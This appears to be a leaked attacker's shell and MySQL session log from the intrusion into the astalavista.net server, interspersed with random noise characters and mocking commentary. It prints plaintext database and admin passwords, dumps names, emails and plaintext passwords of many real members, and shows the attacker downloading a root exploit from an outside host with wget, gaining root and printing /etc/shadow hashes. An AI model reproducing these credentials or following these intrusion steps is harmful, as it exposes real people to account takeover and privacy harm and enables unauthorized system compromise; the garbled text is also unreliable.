5 N/ {: v; `5 S8 N2 sdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007) h( S$ d+ u0 b1 }' ?) D
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql0 S' Z9 `" O; s, i! L
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com6 X- d, n' m E f, b9 z; D3 h
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
& W' L- u& O2 N: Y& N* tdrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner1 p$ l O, Y* j3 E8 y5 S
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg, ]) d; D' A% ?8 y, B: g- |
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config/ b8 M5 g. {% N8 E
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron, U; \! p! Y6 s
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd( c3 i$ A- R4 r5 Y
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
$ I) { o& f* ^, H7 s- C-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
9 {* l. Z! V! o" Ydrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
- }3 d# }8 I* F3 V8 o1 @drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour) q. ?: u. C7 K. i5 f, q' y$ g! w
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
5 r* y' y! J: M9 i" l* B-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess% F/ Z7 H O$ G
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php6 |1 K& W7 E! R' N7 q' n, `; _
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
8 |3 A# f. Z# g" z: \0 E$ {' |+ t-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php: u3 ^& p3 b+ W6 M _. Q* j
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
9 c1 ?3 U$ p/ e4 ]( e-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf/ A8 L* w1 Q$ X8 t0 I/ J
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc/ M( y) H$ C2 d
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang8 T8 }7 @2 p) C5 n8 {1 ~
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib; l- k; t5 C. m4 n9 `& R6 U) _4 T6 l5 J
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log# {1 L4 P. n, o2 |% V e1 J
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member* Y& C: K4 P# p r- b
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata0 m1 q: s: M# a5 l. D
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
( X% q, \: A, y& k8 n" k" }0 l-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
; A" M5 r0 S: j: Tdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
; J8 C! q: N; u% Y @. H-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
/ k3 G1 R/ p; s* B0 |! [# v: bdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss. X& W' I( D5 `- w3 c/ b1 ?
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources" a4 L" t# }; ?, q1 F
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
' ]1 R* {, |4 u6 ?- J2 vdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
; A7 {0 K$ q( O: ^+ zdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src/ W5 y' P, h' ?
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl* ], f( U- \9 E9 B( l" D/ `
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
5 g$ ], G; ^" gdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old2 \$ h! q2 R: B
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php3 \) U$ Y0 m3 ~4 v3 l& L
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki5 x1 Y. a% @: f
* }$ d; Q* Z7 ?2 lsh-3.2$ head -20 index.php
1 j* Q, L$ W2 Y& u# D {1 S3 E<?PHP
) `$ n/ P8 `# n/**) q9 |. w5 P2 Z, m
* Mainfile (external) for astalavistaNET v2.0
, I ?7 z1 ^+ u6 a/ k3 a*
0 l1 O, W9 k. z( y% {6 z$ x, h! H* @copyright Astalavista IT Engineering GmbH. c2 m% @, S& i( I( u# A+ V2 G
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
7 j' m. @8 u# R* @version 1.0: \5 `2 c' M) R7 [; @; {
*/
6 Z( G0 P9 o$ ~
) Q2 E) `3 ]* N+ a* a9 d if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
4 U, ^/ J" E2 {# ~ $dontStartSession = false;! b, E+ e. m, w* s. ~6 S: B: j
} else {& g$ V! r l r. S, X$ |; z# d
$dontStartSession = true;
\" z1 W; }+ n0 J/ X# g }
d/ t& Z! o9 L1 h require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
% N$ n1 b( f8 M3 I9 _; i require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);1 @0 c- ^9 F4 R& V
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
% j7 C, x) {* H y7 B require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);/ M8 U0 Z2 V& T/ c' t( n& a9 G0 R
1 Q! D, `& [: i- v/ x
sh-3.2$ cd config
* Q% ^& Y$ K" d+ A" k+ {sh-3.2$ ls -la" Z# D' \$ G) F3 }1 f: N
total 32
+ P. ` V: _1 s/ l* _; Tdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
9 Z7 Z( P( D4 u6 j3 k, f& Mdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..+ L. u. u+ h4 } G
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php k% B$ s# ^& ?1 g: j! [* n9 \+ X
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php& p. ~( u+ g$ l2 u, i
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php' L( y! Y& ~, U0 b% @: c: e; E
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
2 z! f3 G: w! m0 d# s1 @) [2 Z-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
, i+ o: [7 f4 B+ U
8 W$ u5 g5 O4 Psh-3.2$ cat com.conf.php
# e# t" S- a9 H& i[snip]; o1 p% [) o7 g# k, p; t
//member-database
; n3 y- C, g e$_CONFIG['db_mem_server'] = ‘localhost’;
; @6 X% B6 L: r$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;7 }3 d" ~$ l9 L" E5 ~0 I/ B* [6 Q
$_CONFIG['db_mem_user'] = ‘astanet_db’;
' X5 r+ S6 A4 K8 L; h) J$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
& N$ r4 J0 O+ e. L! `$_CONFIG['db_mem_debug'] = false; //true or false
/ e: V5 y, D3 u+ U. [4 ?+ M//ads-database
$ x" D6 D. d+ ~: @5 ]$_CONFIG['db_ads_server'] = ‘localhost’;9 ^' V% F& X* h' a7 F" s( r& Z
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
6 M m! h9 m4 t3 D, \, R3 s$_CONFIG['db_ads_user'] = ‘astanet_db’; a, b% x: T3 I: Q' f# ^
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;. }5 y+ A- G2 I
$_CONFIG['db_ads_debug'] = false; //true or false- A5 T0 k0 c% ~$ q! s& I
//rainbow-database+ A5 W9 I1 F ]9 i
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
! c0 @: T: X$ P/ o+ F$_CONFIG['db_rainbow_database'] = ‘rainbow’;
6 s d3 t ~& T4 h$ a5 N$ R% N$_CONFIG['db_rainbow_user'] = ‘dinu’;
: J( ~: U; v, v; \$_CONFIG['db_rainbow_password'] = ‘dinudinu’;! M7 u" T/ N8 y6 ?
$_CONFIG['db_rainbow_debug'] = false; //true or false
4 a" r3 b0 M& e//mailing lists database% D0 @. z; l% I) L3 _
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;0 o. \! `4 N5 s
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;, B, e& M2 i- |% K1 a* j- o2 E
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;8 t9 v/ H. @! w6 _3 Y; _9 ~
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;- E/ r4 x7 C6 N* A
$_CONFIG['db_mailing_lists_debug'] = false; //true or false# O& o! ?+ ^* b# v1 X
//paypal) K8 m5 Z. v7 b b
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
2 E, ^3 a5 C9 M+ A; k: }0 E$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
1 g7 @# ^$ c r$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
% g) n8 n2 V a r; I$_CONFIG['sub_pp_noship'] = ‘1′;
0 f7 R6 l0 C% V6 h% U$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;) e7 r! ^' I5 w5 ]: t2 U+ |
[snip]
. a! G- o/ w. F3 G F$ E
4 d1 { K% R$ v# W& Ysh-3.2$ cd ..; B8 w4 y* q" m( N! b c
sh-3.2$ cd member
' k( z2 e) Y( h- f; ssh-3.2$ ls -la
' o" J5 [& D$ q; p0 Z7 Ntotal 20+ n) R3 M) f" R, X7 S
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .: _: z7 [& Y2 T4 Q6 H B1 G
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
3 l+ y, W% `( q-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
( R: F2 m2 o4 D* B8 N-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
% w4 _! ^* \3 V/ B8 y/ Vsh-3.2$ cat .htaccess4 k8 X |1 q& K: W; c
SecFilterEngine off6 U+ H$ u% e! W. l
: [( l" M$ ^1 M5 p. O ash-3.2$ cd ..; @' c6 Z1 N. W3 n {& X
sh-3.2$ cd cron
$ |, r& Q9 X* `& C4 U$ |% Osh-3.2$ ls -la
1 n# k$ h; r6 S! B8 f. ~total 168
- b" B5 u( l5 h1 ^! a0 {5 _/ v, tdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .* ~& A) H5 i9 K3 M# D
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
1 Q, B' [$ [" s* i-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php o7 o: w. C3 M2 e0 ^7 v
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php4 \2 ~% m$ P2 A
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php& x: V4 y6 J& B7 d/ z
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php# E# p# ~6 Q) u2 G+ s
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php( z3 e+ j, v$ j
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php# o/ b5 a$ x4 [8 v2 f% b' p" w
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
: c* N, E; c' l( b" w0 g8 M" y-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php; M& M+ [& G/ p; z. ~' A' W
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
: V% ]4 j# G7 M# ?" _3 R-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php* Y' z2 H$ V7 h9 b
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
3 k3 `6 s0 X# i+ ]' h# x-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
7 {; r+ @6 J: B# |$ u" I- X; `& @-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
2 c' J# d, h! w-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php7 }/ S$ O, Q% |3 A
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php V" u/ }9 m, @
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php$ O2 X2 N. a9 C9 y
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
0 H: V5 X: Y0 Y K, K( f2 X2 D-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php) f h* l& h( S+ ^
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email9 y# X$ v8 H8 }0 E ]: i
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php- g3 o3 u* z1 l' X& l
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
' F* X" Z S9 s$ b1 U) H/ `" a& Z9 ]
sh-3.2$ cd ..1 w h5 N/ F/ g9 \- R* ~
sh-3.2$ cd _007
; M1 Z# f. P' q, P( x$ Fsh-3.2$ ls -la2 w% U' I, P$ G$ A7 H
total 243 W* [. \! s$ [' j7 c1 s$ `# [6 B
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
7 {+ v( ~& c; o# {7 ~ y. Ydrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
( f$ v1 R2 ?! A0 b-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
5 g7 ~ f* }9 ]7 u( z9 M-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php, z7 ]9 L. i' b& y
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php/ x. @# B; u% Z$ g+ _; S# T& ]- R
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap, X. G" t5 p; e9 G$ [
& l% V" `) B, p; t9 `% b: }" v" k
sh-3.2$ cat .htaccess# L, i, t. G4 D( I" u# M5 N
authType Basic
( ~6 @+ L" d+ ZauthName Admin
$ Q( h$ t) y% l% WauthUserFile /home/astanet/auth/.htadm_pwd
0 q! Y) t* V. O: Prequire valid-user* w! o' x& T' }, K. ]0 W
7 W1 |# H9 _' M: X M) E* N$ O
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
/ T, r7 R5 k7 M% ^; z: T) M# gadmin2net:CR0bl65MwhfT' |7 Z3 C, V4 z/ X8 T
- d) `; _( G' O5 t) z+ U- ksh-3.2$ mysql -u astanet_db -p
4 ]' E( I }7 Z' h: ~1 t5 [ _8 EEnter password:. c, D: F" J+ ~: m2 j5 _: g
Welcome to the MySQL monitor. Commands end with ; or \g.1 v* t) y5 [( @1 t4 _3 C N
Your MySQL connection id is 275153( S" W: W. Y! u& ^$ a; n3 i
Server version: 5.0.45-community-log MySQL Community Edition (GPL)) _- W$ z- k6 Q8 V" Q
# E4 [6 {8 j; y4 q4 }
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
3 x' a# o1 k3 e# o6 ^ n# c4 b5 }
4 r1 V. C: m! J' Tmysql> show databases;5 _& _ c# G; G! Q7 P
+———————–+, X9 H; S0 X: W! `3 g
| Database |
8 B7 y3 s) f$ z0 ?: s+———————–+
6 q* m6 Y; ?% P$ c| information_schema |
+ n/ R, s2 O7 N, {& L| astanet_ads |" _$ `' B: U( q1 ]
| astanet_mailing_lists |* r4 |( A2 A6 m# ~ P2 N
| astanet_mediawiki |
7 \, D/ n, s1 h4 S, F; X+ a2 o| astanet_membersystem |
: B2 j4 ]- p# K| test |
5 j) C8 y8 S6 {) I1 a+———————–+
9 M* q8 O% `4 Y6 h5 o' m* f- `6 rows in set (0.00 sec)
# h) ?6 _* W1 g, M8 A
) q/ R2 Q5 O( vmysql> use astanet_membersystem
4 }& k: j1 R5 m( T% B4 O4 Q/ vDatabase changed E6 M, q, U0 r |" O
mysql> show tables;* K/ a6 H5 t' y m1 J( }
+———————————–+
j$ `$ t) ~: N- m8 J| Tables_in_astanet_membersystem |8 e8 ? D3 j C+ ?
+———————————–+5 U8 C0 A, Y! g' E9 G
| blacklist_categories |9 e3 x `6 U: b& v* A1 n
| blacklist_content |6 u( [! L' R4 s; N8 V7 U, m
| blacklist_levels |" o# {. F& W( {
| blacklist_mcset |
0 w: r; R# Z) Q1 P| dir_categories |* L6 U6 [ ^+ P0 \* K
| dir_comments |
8 M* _0 ?9 S5 N( O# w, @: |- r% G+ I| dir_links |' V8 U7 [. @. S w
| dir_temp |
! t; T+ v3 S" J+ Q5 `| dir_votes |* m+ b/ Z- h4 Z1 S N
| documents |
. k x7 m. O$ ~0 A3 g| documents_categories |& M$ D% z6 ?# G9 Y
| email_content |
! p( q; t6 _7 z' g( S/ ]- K| email_settings |: }* F; ]6 h( Y+ x( H+ p0 T
| exploits |1 j2 c9 K* Z# a
| exploits_categories |/ M+ q% u4 @: O2 C) z! g ]
| exploittree_categories |
0 W9 U# v m& z, y* r: t4 |4 k| exploittree_exploits |" J# ?& H0 S6 M' t# F# }7 W
| home_values |
) i9 q5 b1 U9 Z5 ^. E| iso_countries |
# @$ i3 W6 \# z1 W7 d) W& B| links_categories |. s* J. c1 m% d
| links_records |7 f$ l( A# {, g5 Z3 z% Z/ C; {
| links_unauth |
$ {: v( p4 |& S9 y7 G| links_votes |
) C2 k3 Q9 C- I# q, b| log |
# {2 L) N- O9 H/ M) ~+ g# \| news_categories |, L/ t3 G: f9 y, z
| news_comments |
! I W0 j1 C- R" E# ^| news_emoticons |
$ I1 X9 S. d, D# A| news_latest |( M9 p/ ?; z! z( m9 O& G
| news_messages |" x' v! f( L0 b6 t1 C) t3 o
| news_statistics | n' V3 ~* |' V
| news_votes |
$ R& I8 _+ Z P, F! _| prices_content |+ O- [" ~ {! @: f
| prices_offers |( c2 ^) e5 Q3 j% n: A
| rss_settings |
2 Z! b8 I% {6 p, j| sessions |6 B+ @# o, x! i" H
| stats_signups |! S4 C+ u# {% m* x
| u2u2 |7 e, g+ q: U& ]" t( w
| u2u_contact |
R6 o& |3 @7 v9 e. }, ~ W| u2u_settings |
4 {, @( [0 L+ a* {4 j| user_keywords_selected_categories |
0 Y( J9 b2 ~2 J* v6 p) N& C| users |4 ~9 v E7 n b$ K) A: w2 I& S: e
| users_ipn_test |
- [/ I6 B( L5 n+ o$ j! W| users_keyword_values |
w1 f. Q" ~7 G| users_profile |
7 W! Y4 x& K7 s1 r% O! j| users_temp |) W- ?$ J" K0 J9 V, \6 s
| users_upgrade |9 e h. V" ?$ G+ v+ ^
+———————————–+
3 A8 q( n4 i7 ?. o46 rows in set (0.00 sec)0 q X* x7 X. H6 y
! [! ]7 H# z6 y" n" S
mysql> describe users;. w; O) @5 `2 Q, y/ V
+————————–+————————————–+——+—–+———————+—————-+! m6 s) D9 j+ h2 ]5 o$ u" S
| Field | Type | Null | Key | Default | Extra |
5 x3 Q; E9 A* N8 c T+————————–+————————————–+——+—–+———————+—————-+4 G/ v9 d* ?3 Y* w
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
7 k. C9 } ^' ~5 Z" i| user | varchar(50) | NO | | | |
) P: o( x& f* l' h" || nickname | varchar(30) | NO | MUL | anonymous | |
, `8 \* p' q* o. X B: D| password | varchar(30) | NO | | | |
+ q8 ]" E+ x# X& r$ M# M| userlevel | tinyint(3) | YES | MUL | NULL | |
+ V0 q( o f+ q" o| exp | int(8) unsigned | NO | | 0 | |
( y5 Q6 b% l$ M/ C| email | varchar(50) | NO | | | |
, `9 D. h% u) Y. ~% N7 v| ip | varchar(15) | NO | | 0 | |" `5 w8 `$ k# u
| proxy | set(’0′,’1′) | NO | | 0 | |
# V+ a4 ?3 l% z) o, P, k3 S| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |1 E7 R7 d0 b# k$ ~7 F& G
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
, `) r) X" r, p; I/ ^% F3 V| anz_in | tinyint(1) | NO | | -1 | |
8 O( M' {1 x4 m% S| status | tinyint(1) unsigned | NO | | 0 | | C8 n* ?' t8 J3 r. w0 W! [
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
- Y, ^3 r6 w6 ?# b5 T) ]/ ?" || freemember | set(’0′,’1′) | NO | | 0 | |
$ D6 I; L. F% P| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
$ r% J" K# p: H" v3 v# k6 b! k| lang | tinytext | NO | | | |: W- b& @ N# N; g& l! ~$ T' H! W
| adid | smallint(6) | NO | | 0 | |0 H |3 z( f3 T
| pp_txn_id | varchar(255) | YES | | NULL | |4 e0 s" D0 g) J
| cnb_transaction_id | varchar(255) | YES | | NULL | |* K9 ?3 B- \/ p% }/ K" Z3 j
| cnb_order_id | varchar(255) | YES | | NULL | |
) w B$ ^2 n/ `" B7 u% i7 x, p| cnb_user_id | int(11) | YES | | 0 | |
* i3 |( X6 V: G8 ]" L+————————–+————————————–+——+—–+———————+—————-+, s) p* u# m( b& w& ?4 l
22 rows in set (0.01 sec)
% j+ e Z0 r+ e3 I( o; u5 P' s ]! b+ m3 Z( R3 x; C, s+ X! i
mysql> select count(*) as skids from users;
, I$ k" F9 Y5 c9 H+——-+- g" j( h/ i2 {) g1 y
| skids |
( c5 N$ n" Q# S4 m( H+——-+- ^% A% _! {4 U* K
| 25199 |
9 [" S% z# U: ~+ ~. {+——-+
# z0 s7 m8 ]4 U( j. w8 X1 row in set (0.00 sec)
) U4 g1 V$ @6 `& N! {; j* U* Q1 P3 a) \. \# r
mysql> select user,nickname,password,email from users where userlevel = 1;# K. J: E! r+ R7 A: j f
+————————–+———————-+——————+———————————–+! a0 k& G& y$ J0 S2 z/ p- J
| user | nickname | password | email |0 ]1 t4 \2 K$ R" Z& |& ^; z, ]
+————————–+———————-+——————+———————————–+
6 x, B9 [/ T6 z| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
+ H* x) B8 x6 C( i| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
0 n) p9 K) v& I! V- u. ^7 B6 {+ X Y| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
+ N" P( H2 x4 `+ p| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |; S5 `% L; d; j: Q! b+ `
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
U- r1 W3 A$ V: X% H/ q6 F| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
! C' P4 j4 ~3 |) X( R| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |) x& _4 f, x3 K- |7 T; B! b
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |' e1 I& M+ I& ]: u# H/ H6 J
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |( M% n! [, D" Z2 r
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |9 l e! Y. j# P: K
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |9 u! g( u4 H2 ]
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
& h y0 Q! g8 s8 o6 z; Y3 K7 \# `| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |% T' {& f# M% S5 l6 J
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
, B: f) e+ _ X2 ]| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |6 N. w1 K a' S& ?* |
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |* y9 d; D: k; p3 y( W
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |6 V, m% K8 U+ L: r
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
0 @- C, a; N! G1 O| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
$ F9 }* }3 `+ s+ n f& ]4 h| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |/ ?% Z g" Z: m2 m5 p4 [9 A
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
2 D+ B2 z U0 J& b| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |; ^" w: S# U7 [, z/ X6 |
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |) B3 G$ [# i- Q" c' Y( S
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |, K/ Y/ }) M- Q* j: E
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |6 i& x2 f% z5 z
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |9 s [: V& [4 Y0 s
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |+ Z8 j( v4 J1 @* v
+————————–+———————-+——————+———————————–+
) u- C9 H- t, i% n* c) n) p3 I27 rows in set (0.00 sec)
4 ?. V; p# ] J% t; `3 D' q
' O: T: m! w5 Z$ E1 [( U) Z: J* zmysql> exit;) w1 h. s/ h% T' o# e% B4 n- H
Bye6 t# f, K. K4 B! t% a, @
5 H+ _7 X& T* D# [! ^[~] plaintext passwords? yes,/ ~- P2 Y4 U, Y% W7 |
Those so called “security professionals” who charge you $6.66 / month to0 R3 e- \9 p& l7 p7 }7 G; g8 v4 V5 Z
register at their hack-proof portal, save your passwords in plaintext…
5 M7 v# [% P! @* D$ g4 T3 U9 Z Nbrilliant!7 N6 i" q7 x$ j6 `# I: d
$ }# G0 {" [2 ~, v/ }
[~] This been fun but we want more.% l: F8 T/ m9 o w% g
, h: y/ f+ X2 Osh-3.2$ uname -a4 ]* F' r, Z8 S/ F, Y
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
1 Y# s+ Y, T: J4 B: t8 Hsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
5 x" W: `3 m1 _# M–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
8 ^$ T3 ^3 S4 w! tResolving anti.sec.labs… 13.33.33.37- t3 V, h) N) [2 H
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
7 d& k/ h, M p6 u, [HTTP request sent, awaiting response… 200 OK
( c1 ~& n+ j4 _Length: 18200 (18K) [text/plain]+ M% q* ~6 a# O! f0 y7 m
Saving to: `g0troot’
9 Y# F$ g+ m2 B
3 B2 \7 h7 s' K0 p* w# @100%[=========================================================================================================================================>] 18,200 58.6K/s in6 F7 M' }5 z% Q$ _% Z/ z
0.3s3 c8 i2 L7 j- E1 f: j; b( p- @8 O$ p
2 F# g4 g5 _( ?. U18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]# h0 S# J: n2 P+ D& r
2 P" m; `/ A/ J- t* X- y) Ish-3.2$ ./g0troot -i x86_64
9 ~- z. y- J: P0 a[+] g0troot - anti.sec.labs1 a+ o7 _& {) L! Y0 r
[+] Target: 2.6.18-128.1.10.el5
2 p, ^& ]; h6 ^* G; H[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
# t7 ?: `' g* v4 N# R
" x; s" P9 p+ T5 f$ y[+] r00tr00t
$ A; ]9 M/ t% d2 c2 a; Z/ [' A3 r[~] Executing shell…
+ r9 k* Q, w# S. G$ W
$ f; b5 A+ V5 A6 ^ O7 a9 Z X& rsh-3.2# id' V% g% @, l, F5 @- G W; I4 r, g
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel), Y! f6 m1 n% c% k0 t* O3 b4 W
' z5 u6 z+ q' R# E$ z5 `# E
sh-3.2# cat /etc/shadow
! V- V1 ]% [% C' Xroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
+ t* g! L2 _* Q8 t3 i[snip]' X, ~, D4 m( m2 X9 ^% {# |
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::7 Y: i) s0 ~/ d, a+ ~! \
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::: P& [' L, l; c, ?. C0 R! [0 E
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::9 d7 c* U2 n& o& T- z1 |
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
5 ]" a; w) q1 C1 u0 M$ O( M# B6 @, k; _/ q i) V
sh-3.2# cat /etc/motd2 L8 b9 q' o9 z
#####################################################8 k ?3 s; k$ o( `8 p
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #! H7 R* c/ _3 @
# |__| [__ | |__| | |__| | | | [__ | |__| #
